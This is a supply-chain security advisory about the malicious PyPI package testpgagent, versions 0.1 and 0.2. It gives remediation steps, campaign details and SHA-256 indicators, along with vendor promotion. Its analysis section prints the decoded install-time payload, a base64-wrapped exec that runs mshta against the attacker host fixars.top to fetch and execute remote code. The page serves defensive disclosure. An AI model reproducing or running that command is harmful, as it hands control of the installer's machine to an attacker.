Which versions of testpgagent are malicious?

The following PyPI versions of testpgagent are flagged malicious: 0.1, 0.2. Treat any of these as compromised.

How do I remediate testpgagent if I installed it?

Remove testpgagent from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is testpgagent part of a known attack campaign?

Yes — testpgagent is associated with the IN-MAL-2026-006655, 2026-06-easyaillm campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect testpgagent in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking testpgagent and packages like it before any post-install script runs.

Malicious package

testpgagentPyPI

Malicious code in testpgagent (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-5824

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

pip uninstall testpgagent

What this malware does

On pip install, setup.py line 19 calls exec(base64.b64decode(...)) whose decoded body is import os; os.system('cmd /c "mshta http://fixars.top"'). This launches Windows mshta.exe against http://fixars.top over plaintext HTTP, fetching and executing an arbitrary HTML-application payload on the installer's machine. The payload is obfuscated with base64+exec to evade casual inspection. The fetch destination is unrelated to any declared publisher, content is unpinned and mutable, and execution is fully attacker-controlled. Any Windows machine running pip install TestPGAgent==0.2 will execute remote code chosen by whoever controls fixars.top at the moment of install.

During installation, the code attempts to download and start a malicious executable.

Likely related to 2025-08-raknet-testing-package.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-easyaillm

Reasons (based on the campaign):

Downloads and executes a remote executable.
obfuscation
malware

Malicious versions

2 flagged

0.10.2

Indicators of compromise (SHA-256)

c3b12f57a72964e978d195ad7c3a9f6fe560ad1990d55bb1b4053d88a6bb9c4f

cc91b82332e104c5788470ba2d3bad983bf7a8d24615c0aa55788877441f6315

Frequently asked questions

No. testpgagent on PyPI has been identified as a malicious package (versions 0.1, 0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-0066552026-06-easyaillm

References

Credits

Amazon Inspector · finder
Kamil Mańkowski (kam193) · reporter

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection